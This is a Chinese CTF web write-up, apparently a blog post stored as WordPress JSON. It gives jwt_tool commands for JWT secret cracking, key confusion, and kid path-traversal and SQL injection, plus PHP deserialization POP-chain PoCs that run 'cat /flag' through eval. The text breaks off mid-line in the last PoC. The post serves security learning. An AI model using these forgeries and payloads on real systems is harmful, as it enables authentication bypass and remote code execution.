{"id":96588,"date":"2026-08-27T23:32:30","date_gmt":"2026-08-27T15:32:30","guid":{"rendered":"https:\/\/www.wsisp.com\/helps\/96588.html"},"modified":"2026-08-27T23:32:30","modified_gmt":"2026-08-27T15:32:30","slug":"%e9%9d%92%e5%b2%91ctf-web%e5%85%a5%e9%97%a8%e7%b3%bb%e5%88%97%ef%bc%88%e4%ba%8c%ef%bc%89","status":"publish","type":"post","link":"https:\/\/www.wsisp.com\/helps\/96588.html","title":{"rendered":"\u9752\u5c91CTF Web\u5165\u95e8\u7cfb\u5217\uff08\u4e8c\uff09"},"content":{"rendered":"<h3>EZJWT<\/h3>\n<p>HS256 \u7b7e\u540d&#xff0c;\u8bd5\u8bd5\u7206\u7834\u5bc6\u94a5&#xff0c;\u8fd9\u91cc\u7528\u7684\u662f jwt_tool \u3002<\/p>\n<p>python jwt_tool.py eyJ0eXAiOiJKV1QiLCJhbGciOiJIUzI1NiJ9.eyJ1c2VybmFtZSI6Imd1ZXN0Iiwicm9sZSI6Imd1ZXN0In0.2s6Ssv1pE5dLPJUWfaVI2apGc2nNC3jAhydYOrwOrMw -C -d rockyou.txt<\/p>\n<p>\u7ed3\u679c\u662f secret &#xff0c;\u7136\u540e\u6539\u6210 admin &#xff0c;\u518d\u8bbf\u95ee\u3002<\/p>\n<h3>EZJWT_1<\/h3>\n<p>RS256 \u7b7e\u540d&#xff0c;\u8fd8\u6cc4\u9732\u4e86\u516c\u94a5&#xff0c;\u8bd5\u8bd5\u6df7\u6dc6\u653b\u51fb&#xff0c;\u53ef\u4ee5\u767b\u5f55&#xff0c;\u63a5\u7740\u6539\u6210 admin &#xff0c;\u518d\u8bbf\u95ee\u3002<\/p>\n<p>python jwt_tool.py eyJ0eXAiOiJKV1QiLCJhbGciOiJSUzI1NiJ9.eyJ1c2VybmFtZSI6Imd1ZXN0Iiwicm9sZSI6Imd1ZXN0In0.F6b5fGPpMcQgH70-Xv_RMwWSczMvZVPxdE8KKkQ2p_VqdkqFcS5shV9BGGQGC7Nu4c3tgV0kTrhVL40VvNzt_PjJUUZ2x7zA6h_jnDjRcMugcujtOmhIXARK2rVPWiN2dYPc69W78fgop6gWfUYcmShCTIZcZKWnKQdd6N6h-lw -X k -pk pubkey.pem -I -pc username -pv admin -pc role -pv admin<\/p>\n<h3>EZJWT_2<\/h3>\n<p>\u8fd9\u9053\u9898\u6709 kid &#xff0c;\u53ef\u4ee5\u5c1d\u8bd5\u6ce8\u5165&#xff0c;\u5e38\u7528\u7684\u6709\/dev\/null &#xff0c;\u8fd9\u4e2a\u662f linux \u7684\u9ed1\u6d1e\u6587\u4ef6&#xff0c;\u8bfb\u51fa\u6765\u7684\u90fd\u662f\u7a7a\u5b57\u7b26\u4e32&#xff0c;\u7136\u540e\u7a7a\u5bc6\u94a5\u7b7e\u540d\u3002<\/p>\n<p>python jwt_tool.py eyJ0eXAiOiJKV1QiLCJhbGciOiJIUzI1NiIsImtpZCI6ImtleTEifQ.eyJ1c2VybmFtZSI6Imd1ZXN0Iiwicm9sZSI6Imd1ZXN0In0.Z_o4MZ1tNK0QiwL9796EZFfl_qCgk5tsp2U5xyCjNMo -I -hc kid -hv &#034;..\/..\/..\/..\/..\/..\/..\/dev\/null&#034; -pc role -pv admin -pc username -pv admin -S hs256 -p &#034;&#034;<\/p>\n<p>\u8fd9\u9053\u9898\u5176\u5b9e\u8fd8\u6709\u4e00\u4e2a\u89e3&#xff0c;\u76ee\u5f55\/keys\/key1 \u76f4\u63a5\u5c31\u80fd\u62ff\u5230\u5bc6\u94a5&#xff0c;\u7136\u540e\u4f2a\u9020\u3002<\/p>\n<h3>EZJWT_3<\/h3>\n<p>\u8fd8\u662f kid &#xff0c;\u4f46\u662f\u4e0a\u4e00\u9898\u7684\u4e0d\u884c\u4e86&#xff0c;\u8bd5\u8bd5 SQL \u6ce8\u5165&#xff0c;\u8fd9\u4e2a\u53ef\u4ee5\u3002<\/p>\n<p>python jwt_tool.py eyJ0eXAiOiJKV1QiLCJhbGciOiJIUzI1NiIsImtpZCI6Im1haW4ta2V5In0.eyJ1c2VybmFtZSI6Imd1ZXN0Iiwicm9sZSI6Imd1ZXN0In0.anb993R-z77NqeNWoonCWs9JF8HcF0ka2keD07ukh9c -I -hc kid -hv &#034;&#039; union select &#039;secret&#039; &#8212; &#034; -pc role -pv admin -pc username -pv admin -S hs256 -p &#034;secret&#034;<\/p>\n<h3>EZPOP<\/h3>\n<p>$flag &#061; file_get_contents(&#034;\/flag&#034;);<br \/>\nclass ShowFlag {<br \/>\npublic $show &#061; false;<br \/>\npublic function __destruct() {<br \/>\nif ($this-&gt;show) {<br \/>\necho $GLOBALS[&#039;flag&#039;];<br \/>\n}<br \/>\n}<br \/>\n}<br \/>\nhighlight_file(FILE);<br \/>\nif (isset($_GET[&#039;data&#039;])) {<br \/>\nunserialize($_GET[&#039;data&#039;]);<br \/>\n}<br \/>\n?&gt;<\/p>\n<p>\u4ee4$this-&gt;show\u4e3atrue\u5373\u53ef\u3002<\/p>\n<p>POC<\/p>\n<p>&lt;?php<br \/>\nclass ShowFlag {<br \/>\n    public $show &#061; true;<br \/>\n}<br \/>\necho urlencode(serialize(new ShowFlag()));<br \/>\n?&gt;<\/p>\n<h3>EZPOP_1<\/h3>\n<p>&lt;?php<br \/>\nclass ShowFlag {<br \/>\n    public $show &#061; false;<br \/>\n    public $code &#061; &#034;&#034;;<br \/>\n    public function __destruct() {<br \/>\n        if ($this-&gt;show) {<br \/>\n            eval($this-&gt;code);<br \/>\n        }<br \/>\n    }<br \/>\n}<br \/>\nif (isset($_COOKIE[&#034;data&#034;])) {<br \/>\n    unserialize($_COOKIE[&#034;data&#034;]);<br \/>\n}<br \/>\nhighlight_file(__FILE__);<\/p>\n<p>\u53ef\u4ee5\u4ee4$this-&gt;show\u4e3atrue&#xff0c;\u7136\u540e\u8fdb\u5165eval($this-&gt;code)&#xff0c;\u8fd9\u65f6\u53bb\u6539\u53d8$this-&gt;code\u7684\u503c\u8fdb\u884c\u547d\u4ee4\u6267\u884c\u3002<\/p>\n<p>POC<\/p>\n<p>&lt;?php<br \/>\nclass ShowFlag<br \/>\n{<br \/>\n    public $show &#061; true;<br \/>\n    public $code &#061; &#034;system(&#039;cat \/flag&#039;);&#034;;<br \/>\n}<br \/>\necho serialize(new ShowFlag());<\/p>\n<h3>EZPOP_2<\/h3>\n<p>&lt;?php<br \/>\n$flag &#061; file_get_contents(&#034;\/flag&#034;);<\/p>\n<p>class Fracture {<br \/>\n    public $delegate;<\/p>\n<p>    public function __destruct() {<br \/>\n        if ($this-&gt;delegate) {<br \/>\n            $this-&gt;delegate-&gt;disperse();<br \/>\n        }<br \/>\n    }<br \/>\n}<\/p>\n<p>class Specter {<br \/>\n    public $latch &#061; false;<\/p>\n<p>    public function __toString() {<br \/>\n        if ($this-&gt;latch) {<br \/>\n            return $GLOBALS[&#039;flag&#039;];<br \/>\n        }<br \/>\n        return &#034;no&#034;;<br \/>\n    }<br \/>\n}<\/p>\n<p>class Thunk {<br \/>\n    public $operand;<\/p>\n<p>    public function __invoke() {<br \/>\n        echo $this-&gt;operand;<br \/>\n    }<br \/>\n}<\/p>\n<p>class Conduit {<br \/>\n    public $handler;<\/p>\n<p>    public function disperse() {<br \/>\n        $f &#061; $this-&gt;handler;<br \/>\n        return $f();<br \/>\n    }<br \/>\n}<\/p>\n<p>highlight_file(__FILE__);<\/p>\n<p>if (isset($_COOKIE[&#039;data&#039;])) {<br \/>\n    unserialize($_COOKIE[&#039;data&#039;]);<br \/>\n}<br \/>\n?&gt;<\/p>\n<p>flag \u662f\u5728 Specter::__toString() \u91cc\u8fd4\u56de\u7684&#xff0c;\u6240\u4ee5\u76ee\u6807\u5f88\u660e\u786e&#xff0c;\u5c31\u662f\u5148\u8ba9 Specter \u91cc\u7684 $latch \u53d8\u6210 true&#xff0c;\u518d\u60f3\u529e\u6cd5\u89e6\u53d1\u4e00\u6b21 __toString()\u3002<\/p>\n<p>\u5148\u770b\u5165\u53e3&#xff0c;Fracture::__destruct() \u4f1a\u5728\u5bf9\u8c61\u9500\u6bc1\u65f6\u6267\u884c $this-&gt;delegate-&gt;disperse()&#xff0c;\u6240\u4ee5\u6700\u5916\u5c42\u53ef\u4ee5\u653e\u4e00\u4e2a Fracture \u5bf9\u8c61\u3002\u63a5\u7740\u8ba9\u5b83\u7684 $delegate \u6307\u5411 Conduit&#xff0c;\u56e0\u4e3a Conduit::disperse() \u4f1a\u628a $this-&gt;handler \u53d6\u51fa\u6765\u8d4b\u7ed9 $f&#xff0c;\u7136\u540e\u6267\u884c $f()\u3002<\/p>\n<p>\u8fd9\u8bf4\u660e $handler \u9700\u8981\u662f\u4e00\u4e2a\u53ef\u8c03\u7528\u5bf9\u8c61&#xff0c;\u6240\u4ee5\u8fd9\u91cc\u653e Thunk\u3002\u5f53\u5bf9\u8c61\u88ab\u5f53\u4f5c\u51fd\u6570\u8c03\u7528\u65f6&#xff0c;\u4f1a\u89e6\u53d1 Thunk::__invoke()&#xff0c;\u800c __invoke() \u91cc\u6709\u4e00\u884c echo $this-&gt;operand\u3002<\/p>\n<p>\u4e8e\u662f\u53ea\u8981\u518d\u628a Thunk \u7684 $operand \u8bbe\u6210 Specter \u5bf9\u8c61&#xff0c;echo \u5bf9\u8c61\u65f6\u5c31\u4f1a\u81ea\u52a8\u89e6\u53d1 Specter::__toString()\u3002\u6700\u540e\u628a Specter \u7684 $latch \u6539\u6210 true&#xff0c;\u6574\u6761\u5229\u7528\u94fe\u5c31\u662f Fracture::__destruct() -&gt; Conduit::disperse() -&gt; Thunk::__invoke() -&gt; Specter::__toString()&#xff0c;\u8fd9\u6837\u5c31\u80fd\u628a flag \u6253\u51fa\u6765\u3002<\/p>\n<p>POC<\/p>\n<p>&lt;?php<br \/>\nclass Fracture {<br \/>\n    public $delegate &#061; true;<br \/>\n}<br \/>\nclass Specter {<br \/>\n    public $latch &#061; true;<br \/>\n}<br \/>\nclass Thunk {<br \/>\n    public $operand;<br \/>\n}<br \/>\nclass Conduit {<br \/>\n    public $handler;<br \/>\n}<br \/>\n$f &#061; new Fracture();<br \/>\n$s &#061; new Specter();<br \/>\n$c &#061; new Conduit();<br \/>\n$t &#061; new Thunk();<br \/>\n$t-&gt;operand &#061; $s;<br \/>\n$c-&gt;handler &#061; $t;<br \/>\n$f-&gt;delegate &#061; $c;<\/p>\n<p>echo urlencode(serialize($f));<\/p>\n<p>?&gt;<\/p>\n<h3>EZPOP_3<\/h3>\n<p>&lt;?php<br \/>\nclass Chrysalis {<br \/>\n    public $vector;<\/p>\n<p>    public function __wakeup() {<br \/>\n        if ($this-&gt;vector) {<br \/>\n            $this-&gt;vector-&gt;catalyze();<br \/>\n        }<br \/>\n    }<\/p>\n<p>    public function __destruct() {<br \/>\n        if ($this-&gt;vector) {<br \/>\n            $this-&gt;vector-&gt;expunge();<br \/>\n        }<br \/>\n    }<br \/>\n}<\/p>\n<p>class Pulsar {<br \/>\n    public $token;<\/p>\n<p>    public function __invoke() {<br \/>\n        echo $this-&gt;token;<br \/>\n    }<br \/>\n}<\/p>\n<p>class Stratum {<br \/>\n    public $binding;<\/p>\n<p>    public function __call($name, $args) {<br \/>\n        $f &#061; $this-&gt;binding-&gt;$name;<br \/>\n        return $f();<br \/>\n    }<br \/>\n}<\/p>\n<p>class Lattice {<br \/>\n    public $facet;<\/p>\n<p>    public function expunge() {<br \/>\n        if ($this-&gt;facet instanceof Sluice) {<br \/>\n            $this-&gt;facet-&gt;drain();<br \/>\n        }<br \/>\n    }<\/p>\n<p>    public function catalyze() {<br \/>\n        if ($this-&gt;facet) {<br \/>\n            $this-&gt;facet-&gt;surge();<br \/>\n        }<br \/>\n    }<br \/>\n}<\/p>\n<p>class Lexicon {<br \/>\n    public $ambit;<\/p>\n<p>    public function __get($name) {<br \/>\n        return $this-&gt;ambit;<br \/>\n    }<br \/>\n}<\/p>\n<p>class Mirage {<br \/>\n    public $latch &#061; false;<br \/>\n    public $a;<\/p>\n<p>    public function __toString() {<br \/>\n        if ($this-&gt;latch) {<br \/>\n            eval($this-&gt;a);<br \/>\n            return &#039;&#039;;<br \/>\n        }<br \/>\n        return &#034;no&#034;;<br \/>\n    }<br \/>\n}<\/p>\n<p>class Sluice {<br \/>\n    public function drain() {<br \/>\n        echo &#034;decoy end\\\\n&#034;;<br \/>\n    }<br \/>\n}<\/p>\n<p>highlight_file(__FILE__);<\/p>\n<p>if (isset($_GET[&#039;data&#039;])) {<br \/>\n    unserialize($_GET[&#039;data&#039;]);<br \/>\n}<br \/>\n?&gt;<\/p>\n<p>\u8fd9\u4e00\u9898\u7684\u5165\u53e3\u5728 Chrysalis::__wakeup()&#xff0c;\u56e0\u4e3a unserialize() \u65f6\u4f1a\u81ea\u52a8\u8c03\u7528\u5b83&#xff0c;\u800c\u91cc\u9762\u6267\u884c\u7684\u662f $this-&gt;vector-&gt;catalyze() \u3002\u6240\u4ee5\u6700\u5916\u5c42\u5bf9\u8c61\u53ef\u4ee5\u5148\u653e\u6210 Chrysalis &#xff0c;\u8ba9\u53cd\u5e8f\u5217\u5316\u4e00\u5f00\u59cb\u5c31\u8fdb\u5165\u94fe\u5b50\u3002<\/p>\n<p>\u63a5\u7740\u8ba9 Chrysalis \u7684 $vector \u6307\u5411 Lattice \u3002\u5728 Lattice::catalyze() \u91cc&#xff0c;\u4f1a\u7ee7\u7eed\u8c03\u7528 $this-&gt;facet-&gt;surge() \u3002\u8fd9\u91cc\u5982\u679c\u628a $facet \u8bbe\u6210 Stratum&#xff0c;\u7531\u4e8e Stratum \u672c\u8eab\u6ca1\u6709 surge() \u8fd9\u4e2a\u65b9\u6cd5&#xff0c;\u5c31\u4f1a\u89e6\u53d1 Stratum::__call() \u3002<\/p>\n<p>Stratum::__call() \u91cc\u5148\u6267\u884c $f &#061; $this-&gt;binding-&gt;$name \u3002\u56e0\u4e3a\u8fd9\u91cc\u8bbf\u95ee\u7684\u662f\u4e0d\u5b58\u5728\u7684\u5c5e\u6027&#xff0c;\u6240\u4ee5\u53ea\u8981\u628a $binding \u6307\u5411 Lexicon &#xff0c;\u5c31\u4f1a\u89e6\u53d1 Lexicon::__get() &#xff0c;\u5e76\u8fd4\u56de $this-&gt;ambit \u3002\u8fd9\u6837 $f \u5b9e\u9645\u4e0a\u5c31\u53d8\u6210\u4e86\u6211\u4eec\u53ef\u63a7\u7684\u5bf9\u8c61\u3002<\/p>\n<p>\u4e0b\u4e00\u884c\u662f return $f() &#xff0c;\u8bf4\u660e $f \u9700\u8981\u80fd\u88ab\u5f53\u4f5c\u51fd\u6570\u8c03\u7528&#xff0c;\u6240\u4ee5\u628a Lexicon \u7684 $ambit \u8bbe\u6210 Pulsar \u3002\u5bf9\u8c61\u5f62\u5f0f\u8c03\u7528\u4f1a\u89e6\u53d1 Pulsar::__invoke() &#xff0c;\u800c\u8fd9\u4e2a\u65b9\u6cd5\u91cc\u6709 echo $this-&gt;token\u3002<\/p>\n<p>\u8fd9\u6837\u4e00\u6765&#xff0c;\u518d\u628a Pulsar \u7684 $token \u8bbe\u6210 Mirage \u5bf9\u8c61&#xff0c;echo \u65f6\u5c31\u4f1a\u81ea\u52a8\u89e6\u53d1 Mirage::__toString()\u3002\u771f\u6b63\u7684\u5371\u9669\u70b9\u5c31\u5728\u8fd9\u91cc&#xff0c;\u53ea\u8981 Mirage \u7684 $latch \u4e3a true&#xff0c;\u5c31\u4f1a\u6267\u884c eval($this-&gt;a)\u3002<\/p>\n<p>\u56e0\u6b64\u6700\u540e\u53ea\u9700\u8981\u628a Mirage \u7684 $latch \u8bbe\u4e3a true&#xff0c;\u518d\u628a $a \u586b\u6210\u547d\u4ee4\u6267\u884c\u4ee3\u7801&#xff0c;\u6574\u6761\u94fe\u5b50\u5c31\u662f Chrysalis::__wakeup() -&gt; Lattice::catalyze() -&gt; Stratum::__call() -&gt; Lexicon::__get() -&gt; Pulsar::__invoke() -&gt; Mirage::__toString() -&gt; eval()\u3002<\/p>\n<p>POC<\/p>\n<p>&lt;?php<br \/>\nclass Chrysalis {<br \/>\n    public $vector;<br \/>\n}<br \/>\nclass Pulsar {<br \/>\n    public $token;<br \/>\n}<br \/>\nclass Stratum {<br \/>\n    public $binding;<br \/>\n}<br \/>\nclass Lattice {<br \/>\n    public $facet;<br \/>\n}<br \/>\nclass Lexicon {<br \/>\n    public $ambit;<br \/>\n}<br \/>\nclass Mirage {<br \/>\n    public $latch &#061; true;<br \/>\n    public $a &#061; &#034;system(&#039;cat \/flag&#039;);&#034;;<br \/>\n}<br \/>\nclass Sluice {<\/p>\n<p>}<br \/>\n$c &#061; new Chrysalis();<br \/>\n$p &#061; new Pulsar();<br \/>\n$s &#061; new Stratum();<br \/>\n$la &#061; new Lattice();<br \/>\n$le &#061; new Lexicon();<br \/>\n$m &#061; new Mirage();<br \/>\n$sl &#061; new Sluice();<\/p>\n<p>$p-&gt;token &#061; $m;<br \/>\n$c-&gt;vector &#061; $la;<br \/>\n$la-&gt;facet &#061; $s;<br \/>\n$le-&gt;ambit &#061; $p;<br \/>\n$s-&gt;binding &#061; $le;<br \/>\necho urlencode(serialize($c));<br \/>\n?&gt;<\/p>\n<h3>EZPOP_4<\/h3>\n<p>&lt;?php<br \/>\nerror_reporting(0);<\/p>\n<p>class ObsidianSanctum {<br \/>\n    public $note &#061; &#034;guest&#034;;<br \/>\n    public $flareValue &#061; &#034;&#034;;<br \/>\n    protected $gate &#061; &#034;&#034;;<br \/>\n    private $echoer;<\/p>\n<p>    public function __destruct() {<br \/>\n        if (md5(md5($this-&gt;note)) &#061;&#061; md5($this-&gt;gate)) {<br \/>\n            if (isset($this-&gt;echoer)) {<br \/>\n                $this-&gt;echoer-&gt;flare &#061; $this-&gt;flareValue;<br \/>\n            }<br \/>\n        }<br \/>\n    }<br \/>\n}<\/p>\n<p>class SpectralPrism {<br \/>\n    public $engine;<br \/>\n    public $payload;<\/p>\n<p>    public function __set($name, $value) {<br \/>\n        if ($name &#061;&#061;&#061; &#034;flare&#034; &amp;&amp; $value &#061;&#061;&#061; &#034;ignite&#034;) {<br \/>\n            $runner &#061; $this-&gt;engine;<br \/>\n            if (is_callable($runner)) {<br \/>\n                $runner($this-&gt;payload);<br \/>\n            } else {<br \/>\n                die(&#034;Denied.\\\\n&#034;);<br \/>\n            }<br \/>\n        }<br \/>\n    }<br \/>\n}<\/p>\n<p>class RuntimeScript {<br \/>\n    public function __invoke($source) {<br \/>\n        if (!is_string($source)) {<br \/>\n            die(&#034;Denied.\\\\n&#034;);<br \/>\n        }<br \/>\n        eval($source);<br \/>\n    }<br \/>\n}<\/p>\n<p>highlight_file(__FILE__);<\/p>\n<p>if (isset($_GET[&#039;data&#039;])) {<br \/>\n    unserialize($_GET[&#039;data&#039;]);<br \/>\n}<br \/>\n?&gt;<\/p>\n<p>\u8fd9\u4e00\u9898\u7684\u89e6\u53d1\u70b9\u5728 ObsidianSanctum::__destruct()\u3002\u6790\u6784\u65f6\u4f1a\u5148\u5224\u65ad md5(md5($this-&gt;note)) &#061;&#061; md5($this-&gt;gate)&#xff0c;\u53ea\u8981\u8ba9 $note &#061; &#034;1&#034;&#xff0c;\u518d\u628a $gate \u8bbe\u6210 md5(&#034;1&#034;)&#xff0c;\u4e5f\u5c31\u662f c4ca4238a0b923820dcc509a6f75849b&#xff0c;\u8fd9\u4e2a\u6761\u4ef6\u5c31\u80fd\u6210\u7acb\u3002<\/p>\n<p>\u6761\u4ef6\u901a\u8fc7\u4e4b\u540e&#xff0c;\u4f1a\u7ee7\u7eed\u5224\u65ad isset($this-&gt;echoer)&#xff0c;\u7136\u540e\u6267\u884c $this-&gt;echoer-&gt;flare &#061; $this-&gt;flareValue\u3002\u8fd9\u91cc\u7684\u5173\u952e\u662f\u539f\u7c7b\u4e2d\u7684 $echoer \u662f private&#xff0c;\u6240\u4ee5\u5e8f\u5217\u5316\u65f6\u4e0d\u80fd\u76f4\u63a5\u9760\u5916\u90e8\u6b63\u5e38\u8d4b\u503c&#xff0c;\u53ea\u80fd\u5148\u7528 public \u5360\u4f4d\u751f\u6210\u5e8f\u5217\u5316\u5b57\u7b26\u4e32&#xff0c;\u518d\u628a\u5c5e\u6027\u540d\u66ff\u6362\u6210\u771f\u6b63\u7684\u79c1\u6709\u5c5e\u6027\u540d \\\\0ObsidianSanctum\\\\0echoer\u3002<\/p>\n<p>\u63a5\u7740\u770b\u8d4b\u503c\u76ee\u6807&#xff0c;\u5982\u679c\u628a $echoer \u6307\u5411 SpectralPrism&#xff0c;\u90a3\u4e48\u7ed9\u4e0d\u5b58\u5728\u7684\u5c5e\u6027 flare \u8d4b\u503c\u65f6&#xff0c;\u5c31\u4f1a\u89e6\u53d1 SpectralPrism::__set()\u3002\u800c __set() \u91cc\u8981\u6c42 $name &#061;&#061;&#061; &#034;flare&#034; \u4e14 $value &#061;&#061;&#061; &#034;ignite&#034;&#xff0c;\u6240\u4ee5\u628a ObsidianSanctum \u7684 $flareValue \u8bbe\u6210 ignite \u5373\u53ef\u8fdb\u5165\u540e\u7eed\u903b\u8f91\u3002<\/p>\n<p>\u8fdb\u5165 __set() \u540e&#xff0c;\u4ee3\u7801\u4f1a\u53d6\u51fa $this-&gt;engine \u8d4b\u7ed9 $runner&#xff0c;\u5e76\u68c0\u67e5 is_callable($runner)\u3002\u56e0\u6b64\u8fd9\u91cc\u8ba9 SpectralPrism \u7684 $engine \u6307\u5411 RuntimeScript \u5bf9\u8c61&#xff0c;\u5c31\u80fd\u5728\u540e\u9762\u7684 $runner($this-&gt;payload) \u91cc\u89e6\u53d1 RuntimeScript::__invoke()\u3002<\/p>\n<p>\u6700\u540e RuntimeScript::__invoke() \u4f1a\u5bf9\u4f20\u5165\u7684 $source \u6267\u884c eval()&#xff0c;\u6240\u4ee5\u53ea\u9700\u8981\u628a SpectralPrism \u7684 $payload \u8bbe\u6210\u547d\u4ee4\u6267\u884c\u4ee3\u7801\u5373\u53ef\u3002\u6574\u6761\u5229\u7528\u94fe\u5c31\u662f ObsidianSanctum::__destruct() -&gt; SpectralPrism::__set() -&gt; RuntimeScript::__invoke() -&gt; eval()\u3002<\/p>\n<p>POC<\/p>\n<p>&lt;?php<br \/>\nclass ObsidianSanctum {<br \/>\n    public $note &#061; &#034;1&#034;;<br \/>\n    public $flareValue &#061; &#034;ignite&#034;;<br \/>\n    protected $gate &#061; &#034;c4ca4238a0b923820dcc509a6f75849b&#034;;<br \/>\n    public $echoer;<br \/>\n}<br \/>\nclass SpectralPrism {<br \/>\n    public $engine;<br \/>\n    public $payload &#061; &#034;system(&#039;cat \/flag&#039;);&#034;;<br \/>\n}<br \/>\nclass RuntimeScript {<\/p>\n<p>}<br \/>\n$o &#061; new ObsidianSanctum();<br \/>\n$s &#061; new SpectralPrism();<br \/>\n$r &#061; new RuntimeScript();<br \/>\n$s-&gt;engine &#061; $r;<br \/>\n$o-&gt;echoer &#061; $s;<\/p>\n<p>$data &#061; serialize($o);<br \/>\n$data &#061; str_replace(&#039;s:6:&#034;echoer&#034;;&#039;, &#039;s:23:&#034;&#039; . &#034;\\\\0ObsidianSanctum\\\\0echoer&#034; . &#039;&#034;;&#039;, $data);<br \/>\necho urlencode($data);<\/p>\n<p>?&gt;<\/p>\n<h3>EZPOP_5<\/h3>\n<p>&lt;?php<br \/>\nclass ChronoVault {<br \/>\n    public $memo &#061; &#034;guest&#034;;<br \/>\n    protected $token &#061; &#034;none&#034;;<br \/>\n    private $isAdmin &#061; false;<br \/>\n    public $bridge;<\/p>\n<p>    public function __wakeup() {<br \/>\n        $this-&gt;token &#061; &#034;none&#034;;<br \/>\n        $this-&gt;isAdmin &#061; false;<br \/>\n    }<\/p>\n<p>    public function __destruct() {<br \/>\n        if ($this-&gt;isAdmin &amp;&amp; $this-&gt;token &#061;&#061;&#061; &#034;QCCTFyyds&#034; &amp;&amp; isset($this-&gt;bridge)) {<br \/>\n            $this-&gt;bridge-&gt;fire($this-&gt;memo);<br \/>\n        }<br \/>\n    }<br \/>\n}<\/p>\n<p>class DirectiveEngine {<br \/>\n    public $sandbox;<\/p>\n<p>    public function __invoke() {<br \/>\n        return ($this-&gt;sandbox)();<br \/>\n    }<br \/>\n}<\/p>\n<p>class EventBridge {<br \/>\n    public $engine;<\/p>\n<p>    public function __call($name, $args) {<br \/>\n        return ($this-&gt;engine)();<br \/>\n    }<br \/>\n}<\/p>\n<p>class ExecutionSandbox {<br \/>\n    public $script;<\/p>\n<p>    public function __invoke() {<br \/>\n        if (preg_match(&#034;\/flag\/i&#034;, $this-&gt;script)) {<br \/>\n            die(&#034;Denied.\\\\n&#034;);<br \/>\n        }<br \/>\n        eval($this-&gt;script);<br \/>\n    }<br \/>\n}<\/p>\n<p>highlight_file(__FILE__);<\/p>\n<p>if (isset($_GET[&#039;data&#039;])) {<br \/>\n    unserialize($_GET[&#039;data&#039;]);<br \/>\n}<br \/>\n?&gt;<\/p>\n<p>\u8fd9\u4e00\u9898\u7684\u5173\u952e\u5361\u70b9\u5728 ChronoVault::__wakeup()\u3002\u6b63\u5e38\u60c5\u51b5\u4e0b&#xff0c;\u53cd\u5e8f\u5217\u5316\u65f6\u4f1a\u628a $token \u91cd\u7f6e\u6210 none&#xff0c;\u518d\u628a $isAdmin \u91cd\u7f6e\u6210 false&#xff0c;\u8fd9\u6837\u6790\u6784\u65f6\u7684\u6761\u4ef6\u5c31\u6c38\u8fdc\u8fdb\u4e0d\u53bb\u3002<\/p>\n<p>\u4f46\u9898\u76ee\u73af\u5883\u662f\u8001\u7248\u672c PHP&#xff0c;\u53ef\u4ee5\u5229\u7528 CVE-2016-7124 \u8fd9\u4e00\u7c7b __wakeup() \u7ed5\u8fc7\u3002\u505a\u6cd5\u5c31\u662f\u5148\u6b63\u5e38\u6784\u9020\u5bf9\u8c61&#xff0c;\u518d\u628a\u5e8f\u5217\u5316\u7ed3\u679c\u91cc ChronoVault \u7684\u5c5e\u6027\u6570\u91cf\u4ece\u771f\u5b9e\u7684 4 \u6539\u6210\u66f4\u5927\u7684\u503c&#xff0c;\u8ba9 unserialize() \u65f6\u8df3\u8fc7 __wakeup()&#xff0c;\u8fd9\u6837\u6211\u4eec\u4f2a\u9020\u8fdb\u53bb\u7684 $token \u548c $isAdmin \u5c31\u80fd\u4fdd\u7559\u4e0b\u6765\u3002<\/p>\n<p>\u6761\u4ef6\u4fdd\u4f4f\u4e4b\u540e&#xff0c;ChronoVault::__destruct() \u4f1a\u6267\u884c $this-&gt;bridge-&gt;fire($this-&gt;memo)\u3002EventBridge \u91cc\u5e76\u6ca1\u6709 fire() \u8fd9\u4e2a\u65b9\u6cd5&#xff0c;\u6240\u4ee5\u8fd9\u91cc\u4f1a\u81ea\u52a8\u89e6\u53d1 EventBridge::__call()&#xff0c;\u800c __call() \u91cc\u76f4\u63a5\u6267\u884c\u7684\u662f ($this-&gt;engine)()\u3002<\/p>\n<p>\u8fd9\u8bf4\u660e engine \u53ea\u9700\u8981\u662f\u4e00\u4e2a\u53ef\u8c03\u7528\u5bf9\u8c61\u5373\u53ef&#xff0c;\u56e0\u6b64\u6700\u77ed\u94fe\u5c31\u662f\u8ba9 EventBridge \u7684 $engine \u76f4\u63a5\u6307\u5411 ExecutionSandbox\u3002\u56e0\u4e3a ExecutionSandbox \u672c\u8eab\u5b9e\u73b0\u4e86 __invoke()&#xff0c;\u6240\u4ee5\u5bf9\u8c61\u51fd\u6570\u8c03\u7528\u65f6\u4f1a\u76f4\u63a5\u8fdb\u5165 ExecutionSandbox::__invoke()\u3002<\/p>\n<p>\u6700\u540e\u7684\u5229\u7528\u70b9\u5c31\u5728 ExecutionSandbox::__invoke() \u91cc\u7684 eval($this-&gt;script)\u3002\u867d\u7136\u4ee3\u7801\u4f1a\u7528 preg_match(&#034;\/flag\/i&#034;, $this-&gt;script) \u8fc7\u6ee4\u6389\u76f4\u63a5\u51fa\u73b0\u7684 flag&#xff0c;\u4f46\u8fd9\u9898\u5b9e\u9645\u4e0d\u9700\u8981\u547d\u4ee4\u6267\u884c\u53bb\u8bfb\u6587\u4ef6&#xff0c;\u56e0\u4e3a flag \u5c31\u5728 phpinfo() \u7684\u8f93\u51fa\u91cc&#xff0c;\u6240\u4ee5\u628a $script \u8bbe\u6210 phpinfo(); \u5373\u53ef\u3002<\/p>\n<p>\u6574\u6761\u94fe\u5b50\u5c31\u662f&#xff1a;\u7ed5\u8fc7 ChronoVault::__wakeup()&#xff0c;\u4fdd\u7559\u4f2a\u9020\u7684 $token \u548c $isAdmin&#xff0c;\u7136\u540e\u5728 ChronoVault::__destruct() \u91cc\u89e6\u53d1 EventBridge::__call()&#xff0c;\u518d\u8fdb\u5165 ExecutionSandbox::__invoke()&#xff0c;\u6700\u7ec8\u901a\u8fc7 eval() \u6267\u884c phpinfo();\u3002<\/p>\n<p>POC<\/p>\n<p>&lt;?php<br \/>\nclass ChronoVault {<br \/>\n    public $memo &#061; &#034;guest&#034;;<br \/>\n    protected $token &#061; &#034;QCCTFyyds&#034;;<br \/>\n    private $isAdmin &#061; true;<br \/>\n    public $bridge;<br \/>\n}<br \/>\nclass EventBridge {<br \/>\n    public $engine;<br \/>\n}<br \/>\nclass ExecutionSandbox {<br \/>\n    public $script &#061; &#034;phpinfo();&#034;;<br \/>\n}<\/p>\n<p>$o &#061; new ChronoVault();<br \/>\n$b &#061; new EventBridge();<br \/>\n$s &#061; new ExecutionSandbox();<\/p>\n<p>$b-&gt;engine &#061; $s;<br \/>\n$o-&gt;bridge &#061; $b;<\/p>\n<p>$data &#061; serialize($o);<br \/>\n$data &#061; 